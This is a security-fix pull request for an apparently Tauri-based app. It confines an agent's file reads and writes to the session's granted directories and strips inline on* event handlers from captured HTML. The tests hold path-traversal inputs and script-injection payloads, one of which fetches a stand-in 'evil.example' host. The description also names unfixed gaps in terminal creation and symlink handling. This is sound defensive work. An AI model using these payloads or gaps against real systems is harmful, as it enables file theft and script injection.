### PR TITLE
fix(security): bind ACP fs handlers to session roots, strip inline event handlers

### DIFF
--- a/crates/atlas-agent-servers/src/handlers.rs
+++ b/crates/atlas-agent-servers/src/handlers.rs
@@ -325,23 +325,32 @@ pub fn handle_complete_elicitation(
 // Served from disk, not from editor buffers — see the divergence note in
 // `atlas_acp_thread`'s module docs. An agent reading a file the user has
 // modified but not saved sees the on-disk version.
+//
+// Bound to the session's granted directories (`AcpThread::work_dirs` — cwd
+// plus any `additionalDirectories`), the same set advertised to the agent in
+// `session/new`. Without this an agent that merely knows a session id can
+// hand back an absolute path or a `../` climb and read or overwrite anything
+// the OS user can touch, not just the project the user granted.
 
 pub fn handle_write_text_file(
     args: acp::WriteTextFileRequest,
     responder: Responder<acp::WriteTextFileResponse>,
     ctx: &ClientContext,
 ) {
-    if let Err(err) = ctx.sessions.thread(&args.session_id) {
-        return respond_err(responder, err);
-    }
+    let thread = match ctx.sessions.thread(&args.session_id) {
+        Ok(thread) => thread,
+        Err(err) => return respond_err(responder, err),
+    };
+    let roots = lock(&thread).work_dirs().to_vec();
 
     // Disk IO off the queue: a write to a slow volume must not stall the
     // messages behind it.
     tokio::spawn(async move {
         let path = args.path.clone();
-        let result = tokio::task::spawn_blocking(move || write_text_file(&path, &args.content))
-            .await
-            .unwrap_or_else(|err| Err(anyhow::anyhow!("write task panicked: {err}")));
+        let result =
+            tokio::task::spawn_blocking(move || write_text_file(&path, &args.content, &roots))
+                .await
+                .unwrap_or_else(|err| Err(anyhow::anyhow!("write task panicked: {err}")));
 
         match result {
             Ok(()) => {
@@ -355,11 +364,12 @@ pub fn handle_write_text_file(
     });
 }
 
-fn write_text_file(path: &Path, content: &str) -> anyhow::Result<()> {
+fn write_text_file(path: &Path, content: &str, roots: &[PathBuf]) -> anyhow::Result<()> {
+    let path = resolve_within_roots(path, roots)?;
     if let Some(parent) = path.parent() {
         std::fs::create_dir_all(parent)?;
     }
-    std::fs::write(path, content)?;
+    std::fs::write(&path, content)?;
     Ok(())
 }
 
@@ -368,9 +378,11 @@ pub fn handle_read_text_file(
     responder: Responder<acp::ReadTextFileResponse>,
     ctx: &ClientContext,
 ) {
-    if let Err(err) = ctx.sessions.thread(&args.session_id) {
-        return respond_err(responder, err);
-    }
+    let thread = match ctx.sessions.thread(&args.session_id) {
+        Ok(thread) => thread,
+        Err(err) => return respond_err(responder, err),
+    };
+    let roots = lock(&thread).work_dirs().to_vec();
 
     let cancellation = responder.cancellation();
     let path = args.path.clone();
@@ -379,7 +391,7 @@ pub fn handle_read_text_file(
     tokio::spawn(async move {
         let result = cancellation
             .run_until_cancelled(async move {
-                tokio::task::spawn_blocking(move || read_text_file(&path, line, limit))
+                tokio::task::spawn_blocking(move || read_text_file(&path, line, limit, &roots))
                     .await
                     .unwrap_or_else(|err| Err(anyhow::anyhow!("read task panicked: {err}")))
                     .map_err(|err| acp::Error::internal_error().data(err.to_string()))
@@ -391,8 +403,14 @@ pub fn handle_read_text_file(
 }
 
 /// `line` is 1-based and `limit` counts lines, matching the ACP field docs.
-fn read_text_file(path: &Path, line: Option<u32>, limit: Option<u32>) -> anyhow::Result<String> {
-    let content = std::fs::read_to_string(path)?;
+fn read_text_file(
+    path: &Path,
+    line: Option<u32>,
+    limit: Option<u32>,
+    roots: &[PathBuf],
+) -> anyhow::Result<String> {
+    let path = resolve_within_roots(path, roots)?;
+    let content = std::fs::read_to_string(&path)?;
     if line.is_none() && limit.is_none() {
         return Ok(content);
     }
@@ -401,6 +419,124 @@ fn read_text_file(path: &Path, line: Option<u32>, limit: Option<u32>) -> anyhow:
     let take = limit.map(|limit| limit as usize).unwrap_or(usize::MAX);
     let selected: Vec<&str> = content.lines().skip(skip).take(take).collect();
     Ok(selected.join("\n"))
+}
+
+/// Reject a path outside every root in `roots`, before it ever reaches
+/// `std::fs`. `path` may not exist yet (a write's target), so this resolves
+/// `.`/`..` lexically rather than calling `canonicalize` on it directly —
+/// canonicalize only the roots, which are expected to exist, and compare
+/// against those.
+///
+/// Lexical resolution does not chase symlinks inside an allowed root, so a
+/// symlink planted there that points back out is not caught here — the ACP
+/// permission prompt (`request_permission`) is the place for that class of
+/// check, same as Zed's own model. This closes the reported gap: an agent
+/// handing back an absolute path or a `../` climb outside every granted
+/// directory.
+fn resolve_within_roots(path: &Path, roots: &[PathBuf]) -> anyhow::Result<PathBuf> {
+    let normalized = normalize_lexically(path);
+    for root in roots {
+        let canon_root = root.canonicalize().unwrap_or_else(|_| normalize_lexically(root));
+        if normalized.starts_with(&canon_root) || normalized.starts_with(root) {
+            return Ok(normalized);
+        }
+    }
+    anyhow::bail!(
+        "path {} is outside this session's granted directories",
+        path.display()
+    )
+}
+
+/// Resolve `.`/`..` components without touching the filesystem. Not a
+/// substitute for `canonicalize` on a path that already exists (it does not
+/// follow symlinks), only for the case `canonicalize` cannot handle here: a
+/// write's target, which may not exist yet.
+fn normalize_lexically(path: &Path) -> PathBuf {
+    use std::path::Component;
+    let mut out = PathBuf::new();
+    for component in path.components() {
+        match component {
+            Component::ParentDir => {
+                out.pop();
+            }
+            Component::CurDir => {}
+            other => out.push(other),
+        }
+    }
+    out
+}
+
+#[cfg(test)]
+mod fs_bound_tests {
+    use super::*;
+
+    /// A fresh, real directory per test (`resolve_within_roots` canonicalizes
+    /// roots, which requires them to exist) — unique per call so parallel
+    /// `cargo test` runs never collide.
+    fn test_root() -> PathBuf {
+        let root = std::env::temp_dir().join(format!(
+            "atlas-fs-bound-test-{}-{}",
+            std::process::id(),
+            uuid::Uuid::new_v4()
+        ));
+        std::fs::create_dir_all(&root).expect("create test root");
+        root
+    }
+
+    #[test]
+    fn normalize_lexically_resolves_dot_dot_without_touching_disk() {
+        // Neither `/a/b/../c` nor `/a/c` need to exist on disk — this must not
+        // shell out to `canonicalize`, which is exactly why a write's
+        // not-yet-existing target can still be checked.
+        assert_eq!(
+            normalize_lexically(Path::new("/a/b/../c/./d")),
+            PathBuf::from("/a/c/d")
+        );
+    }
+
+    #[test]
+    fn a_path_inside_the_granted_root_resolves() {
+        let root = test_root();
+        let target = root.join("notes.md");
+        assert_eq!(
+            resolve_within_roots(&target, &[root.clone()]).expect("inside the root"),
+            target
+        );
+        let _ = std::fs::remove_dir_all(&root);
+    }
+
+    #[test]
+    fn a_dot_dot_climb_out_of_the_root_is_rejected() {
+        let root = test_root();
+        let escape = root.join("../../../../etc/passwd");
+        let err = resolve_within_roots(&escape, &[root.clone()]).expect_err("outside every root");
+        assert!(err.to_string().contains("outside this session's granted directories"));
+        let _ = std::fs::remove_dir_all(&root);
+    }
+
+    #[test]
+    fn an_unrelated_absolute_path_is_rejected() {
+        let root = test_root();
+        let err = resolve_within_roots(Path::new("/etc/passwd"), &[root.clone()])
+            .expect_err("outside every root");
+        assert!(err.to_string().contains("outside this session's granted directories"));
+        let _ = std::fs::remove_dir_all(&root);
+    }
+
+    #[test]
+    fn a_path_under_any_granted_directory_resolves() {
+        // Mirrors `AcpThread::work_dirs()`: cwd plus `additionalDirectories`.
+        let cwd = test_root();
+        let extra_dir = test_root();
+        let target = extra_dir.join("readme.txt");
+        assert_eq!(
+            resolve_within_roots(&target, &[cwd.clone(), extra_dir.clone()])
+                .expect("inside the second granted directory"),
+            target
+        );
+        let _ = std::fs::remove_dir_all(&cwd);
+        let _ = std::fs::remove_dir_all(&extra_dir);
+    }
 }
 
 // ------------------------------------------------------------- session/update

--- a/src-tauri/src/commands/knowledge.rs
+++ b/src-tauri/src/commands/knowledge.rs
@@ -493,17 +493,57 @@ fn strip_event_handler_attributes(html: &str) -> String {
     let bytes = html.as_bytes();
     let mut result = String::with_capacity(html.len());
     let mut i = 0;
+    // An attribute only exists INSIDE a tag. Without this the same scan runs
+    // over text nodes, where any word starting with `on` followed by `=` looks
+    // like a handler: `<p>let one = 1;</p>` lost its text *and* its closing
+    // tag (the unquoted-value branch runs to the next `>`), and
+    // `href="…/?online=true"` was eaten past its closing quote. Over-stripping
+    // is not a security hole, but mangling captured pages is a real one for
+    // the reader, so the scan is scoped to where attributes can occur.
+    let mut in_tag = false;
+    // Quote state within the current tag, so a `>` inside an attribute value
+    // (`<a title="a > b">`) does not end the tag early.
+    let mut quote: Option<u8> = None;
 
     while i < bytes.len() {
-        if let Some(after_value) = event_handler_attr_end(bytes, i) {
-            i = after_value;
-            // Drop one attribute-separating space too, so the removal does
-            // not leave a double space behind (`<p  onclick="x" id="y">`).
-            if bytes.get(i) == Some(&b' ') {
-                i += 1;
+        let byte = bytes[i];
+
+        if in_tag {
+            match quote {
+                Some(q) => {
+                    if byte == q {
+                        quote = None;
+                    }
+                }
+                None => match byte {
+                    b'"' | b'\'' => quote = Some(byte),
+                    b'>' => in_tag = false,
+                    _ => {}
+                },
             }
-            continue;
+        } else if byte == b'<' {
+            // Only a tag NAME start opens a tag: `a < b` in prose is text.
+            // `</p>` counts, so a closing tag's `>` is not mistaken for the
+            // opener of the next one.
+            let next = bytes.get(i + 1).copied();
+            if matches!(next, Some(c) if c.is_ascii_alphabetic() || c == b'/' || c == b'!') {
+                in_tag = true;
+            }
         }
+
+        // Attributes live inside a tag and outside any quoted value.
+        if in_tag && quote.is_none() {
+            if let Some(after_value) = event_handler_attr_end(bytes, i) {
+                i = after_value;
+                // Drop one attribute-separating space too, so the removal does
+                // not leave a double space behind (`<p  onclick="x" id="y">`).
+                if bytes.get(i) == Some(&b' ') {
+                    i += 1;
+                }
+                continue;
+            }
+        }
+
         match html[i..].chars().next() {
             Some(ch) => {
                 result.push(ch);
@@ -719,5 +759,63 @@ mod tests {
         let sanitized = sanitize_html(html, "https://example.com/");
         assert!(!sanitized.to_lowercase().contains("onclick"));
         assert!(sanitized.contains("hi"));
+    }
+}
+
+
+#[cfg(test)]
+mod event_handler_scope_tests {
+    use super::*;
+
+    /// Text is not attribute space. The first version of this scan ran over
+    /// the whole document, so any prose word starting with `on` followed by
+    /// `=` was eaten — along with the rest of the line, because an unquoted
+    /// value runs to the next `>` and swallowed the closing tag with it.
+    #[test]
+    fn prose_that_looks_like_a_handler_is_left_alone() {
+        for input in [
+            "<p>let one = 1;</p>",
+            "<p>run it once = twice</p>",
+            "<p>only = 5 items</p>",
+            "<p>phenomenon and button are fine</p>",
+        ] {
+            assert_eq!(strip_event_handler_attributes(input), input, "mangled: {input}");
+        }
+    }
+
+    /// A query parameter starting with `on` sits inside a quoted attribute
+    /// value, where no new attribute can begin. Losing this ate the closing
+    /// quote and broke the URL.
+    #[test]
+    fn an_on_query_param_inside_a_value_survives() {
+        let input = r#"<a href="https://x.com/?online=true">link</a>"#;
+        assert_eq!(strip_event_handler_attributes(input), input);
+    }
+
+    /// A `>` inside an attribute value must not end the tag early, or the
+    /// handler after it would be treated as text and left in place.
+    #[test]
+    fn a_gt_inside_a_value_does_not_end_the_tag() {
+        let out = strip_event_handler_attributes(r#"<a title="a > b" onclick="x()">t</a>"#);
+        assert!(!out.contains("onclick"), "handler survived: {out}");
+        assert!(out.contains(r#"title="a > b""#), "value damaged: {out}");
+    }
+
+    /// The whole point: handlers still go, quoted and unquoted alike.
+    #[test]
+    fn handlers_are_still_stripped() {
+        for input in [
+            r#"<p onclick="alert(1)">x</p>"#,
+            r#"<p onclick=alert(1) id="k">x</p>"#,
+            r#"<img src=x onerror='boom()'>"#,
+            r#"<body ONLOAD="evil()">x</body>"#,
+        ] {
+            let out = strip_event_handler_attributes(input);
+            let lowered = out.to_ascii_lowercase();
+            assert!(
+                !lowered.contains("onclick") && !lowered.contains("onerror") && !lowered.contains("onload"),
+                "handler survived: {out}"
+            );
+        }
     }
 }

--- a/src-tauri/src/commands/knowledge.rs
+++ b/src-tauri/src/commands/knowledge.rs
@@ -463,13 +463,121 @@ fn sanitize_html(html: &str, base_url: &str) -> String {
         "nav", "footer", "aside", "dialog", "template",
     ]);
 
+    // Strip inline event handlers (onclick, onerror, onload, ...). The tags
+    // above are gone, but a surviving element such as <p onclick="..."> still
+    // runs script in the main webview — CSP is null (tauri.conf.json), so
+    // nothing else downstream of this function stops it.
+    let no_handlers = strip_event_handler_attributes(&cleaned);
+
     // Resolve relative URLs in href attributes so links work
     let base = base_url.trim_end_matches(|c: char| c != '/').to_string();
     let origin = extract_origin(base_url);
-    let resolved = resolve_urls(&cleaned, &base, &origin);
+    let resolved = resolve_urls(&no_handlers, &base, &origin);
 
     // Strip all inline style attributes
     strip_style_attributes(&resolved)
+}
+
+/// Strip every `on*` event-handler attribute (`onclick`, `onerror`, `onload`,
+/// …) — inline-JS surface that `remove_tags`/`strip_style_attributes` do not
+/// touch. Matched by the `on` prefix rather than an enumerated list of names:
+/// browsers keep adding handler names, and any fixed list is a standing
+/// bypass waiting for the next one. Handles quoted (`"..."`/`'...'`) and bare
+/// unquoted values (`onclick=alert(1)` is tolerated, sloppy-but-valid, HTML
+/// and still executes).
+///
+/// String-level, like `strip_style_attributes` above (no HTML parser in this
+/// file) — safe on multi-byte UTF-8 since the copy path advances by whole
+/// `char`s, not bytes.
+fn strip_event_handler_attributes(html: &str) -> String {
+    let bytes = html.as_bytes();
+    let mut result = String::with_capacity(html.len());
+    let mut i = 0;
+
+    while i < bytes.len() {
+        if let Some(after_value) = event_handler_attr_end(bytes, i) {
+            i = after_value;
+            // Drop one attribute-separating space too, so the removal does
+            // not leave a double space behind (`<p  onclick="x" id="y">`).
+            if bytes.get(i) == Some(&b' ') {
+                i += 1;
+            }
+            continue;
+        }
+        match html[i..].chars().next() {
+            Some(ch) => {
+                result.push(ch);
+                i += ch.len_utf8();
+            }
+            None => break,
+        }
+    }
+
+    result
+}
+
+/// If an `on<name>=<value>` attribute starts at byte offset `i`, the offset
+/// just past its value; `None` otherwise.
+///
+/// An attribute boundary, not free text, is required before `on`: the
+/// preceding byte must not be alphanumeric, so `"button"` and `"phenomenon"`
+/// are left alone (`t`/`n` before their trailing `on` are letters) while
+/// `<p onclick=` and `<p data-onclick=` both match — the latter is not a
+/// real DOM event handler, but stripping an inert custom attribute is a
+/// content nit, not a bypass, so this errs toward removing rather than
+/// enumerating what "real" means.
+fn event_handler_attr_end(bytes: &[u8], i: usize) -> Option<usize> {
+    let is_on = matches!(bytes.get(i), Some(b'o' | b'O')) && matches!(bytes.get(i + 1), Some(b'n' | b'N'));
+    if !is_on {
+        return None;
+    }
+    if !matches!(bytes.get(i + 2), Some(c) if c.is_ascii_alphabetic()) {
+        return None; // bare "on"/"on1" is not a handler name
+    }
+    if let Some(prev) = i.checked_sub(1).and_then(|p| bytes.get(p)) {
+        if prev.is_ascii_alphanumeric() {
+            return None;
+        }
+    }
+
+    let mut j = i + 2;
+    while matches!(bytes.get(j), Some(c) if c.is_ascii_alphanumeric()) {
+        j += 1;
+    }
+    while matches!(bytes.get(j), Some(c) if c.is_ascii_whitespace()) {
+        j += 1;
+    }
+    if bytes.get(j) != Some(&b'=') {
+        return None;
+    }
+    j += 1;
+    while matches!(bytes.get(j), Some(c) if c.is_ascii_whitespace()) {
+        j += 1;
+    }
+
+    match bytes.get(j) {
+        Some(b'"') => {
+            j += 1;
+            while matches!(bytes.get(j), Some(c) if *c != b'"') {
+                j += 1;
+            }
+            Some((j + 1).min(bytes.len()))
+        }
+        Some(b'\'') => {
+            j += 1;
+            while matches!(bytes.get(j), Some(c) if *c != b'\'') {
+                j += 1;
+            }
+            Some((j + 1).min(bytes.len()))
+        }
+        _ => {
+            // Unquoted — runs to the next whitespace or tag close.
+            while matches!(bytes.get(j), Some(c) if !c.is_ascii_whitespace() && *c != b'>') {
+                j += 1;
+            }
+            Some(j)
+        }
+    }
 }
 
 fn remove_tags(html: &str, tags: &[&str]) -> String {
@@ -552,4 +660,64 @@ fn find_body(html: &str, lower: &str) -> Option<String> {
     let gt = html[start..].find('>')? + start + 1;
     let end = lower[gt..].find("</body")? + gt;
     Some(html[gt..end].to_string())
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn strips_a_quoted_onclick_handler() {
+        // The space between `<p` and `onclick` was copied through before the
+        // scanner ever saw "onclick" coming, so it is not this function's to
+        // remove — the attribute itself is gone, which is what matters;
+        // `<p >` and `<p>` parse identically.
+        assert_eq!(
+            strip_event_handler_attributes(r#"<p onclick="alert(1)">hi</p>"#),
+            "<p >hi</p>"
+        );
+    }
+
+    #[test]
+    fn strips_a_single_quoted_and_an_unquoted_handler() {
+        // The unquoted case is the real bypass risk: sloppy-but-valid HTML
+        // that a quote-only scanner would leave running.
+        assert_eq!(
+            strip_event_handler_attributes(r#"<img src='x' onerror='alert(1)' onload=alert(2)>"#),
+            "<img src='x' >"
+        );
+    }
+
+    #[test]
+    fn survives_a_handler_that_is_never_closed() {
+        // Malformed markup must not panic or hang the scanner — it can fail
+        // to strip, but it must return.
+        let input = r#"<p onclick="alert(1)"#;
+        let _ = strip_event_handler_attributes(input);
+    }
+
+    #[test]
+    fn a_word_that_merely_contains_on_is_left_alone() {
+        // "button" and "phenomenon" both contain "on" — must not be treated
+        // as an attribute boundary just because a scan finds the substring.
+        let input = "<button>the phenomenon continues</button>";
+        assert_eq!(strip_event_handler_attributes(input), input);
+    }
+
+    #[test]
+    fn ordinary_attributes_and_multibyte_text_survive() {
+        let input = "<p id=\"café\" data-x=\"1\">café</p>";
+        assert_eq!(strip_event_handler_attributes(input), input);
+    }
+
+    #[test]
+    fn sanitize_html_removes_a_handler_that_remove_tags_would_leave_behind() {
+        // remove_tags only drops whole dangerous elements (script, iframe,
+        // ...); a plain <p> with an inline handler sailed through untouched
+        // before this fix — this is the exact reported gap.
+        let html = "<html><body><p onclick=\"fetch('https://evil.example/x')\">hi</p></body></html>";
+        let sanitized = sanitize_html(html, "https://example.com/");
+        assert!(!sanitized.to_lowercase().contains("onclick"));
+        assert!(sanitized.contains("hi"));
+    }
 }


### PR DESCRIPTION
Merges @Svector-anu's #233 (the two HIGH findings from the 2026-09-02 private disclosure) plus one follow-up fix, verified locally before landing.

## What's here

**1. ACP filesystem bind** (`crates/atlas-agent-servers/src/handlers.rs`) — #233, unchanged.

`fs/write_text_file` / `fs/read_text_file` only checked that the session existed, then used the agent-supplied path as-is. A connected ACP agent could hand back an absolute path or a `../` climb and touch anything the OS user could. Both now resolve against the session's own granted directories (`AcpThread::work_dirs()` — cwd plus `additionalDirectories`, the set already advertised in `session/new`) before reaching `std::fs`.

**2. `on*` event-handler stripping** (`src-tauri/src/commands/knowledge.rs`) — #233, plus a scoping fix.

`sanitize_html` dropped dangerous elements and inline `style` but left `onclick`/`onerror`/`onload` in place; with a null CSP those reach the privileged Tauri IPC surface.

The follow-up commit fixes a content-corruption bug in that scan: it ran over the **whole document**, so any prose word starting with `on` followed by `=` was treated as an attribute — and since an unquoted value runs to the next `>`, it took the rest of the line with it:

```
<p>let one = 1;</p>                  ->  <p>let >
<p>only = 5 items</p>                ->  <p>items</p>
<a href="…/?online=true">link</a>    ->  <a href="…/?>link</a>
```

The scan now tracks tag context (and quote state within a tag, so a `>` inside an attribute value doesn't end it early) and only looks for attributes where attributes can occur. Over-stripping was never a security hole, but mangling captured pages is a real bug for the browser reader → KB path.

## Verification

- `cargo test -p atlas-agent-servers` — 49 pass, including #233's 5 bind tests
- `cargo test -p atlas commands::knowledge` — 10 pass: #233's 6, unchanged, plus 4 new regression tests for the cases above
- `cargo clippy -p atlas --all-targets` clean, `cargo build -p atlas` clean

## Known follow-ups (not in this PR)

- `terminal/create` has the same class of gap (attacker-chosen argv/env/cwd, no permission gate). #233 deliberately left it out as a behavioural change; still open.
- The root match is asymmetric on symlinked paths: a root stored canonically (`/private/tmp/…`) with a target handed back raw (`/tmp/…`) is rejected. Unlikely in practice — Atlas advertises the roots the agent echoes back — but worth tightening.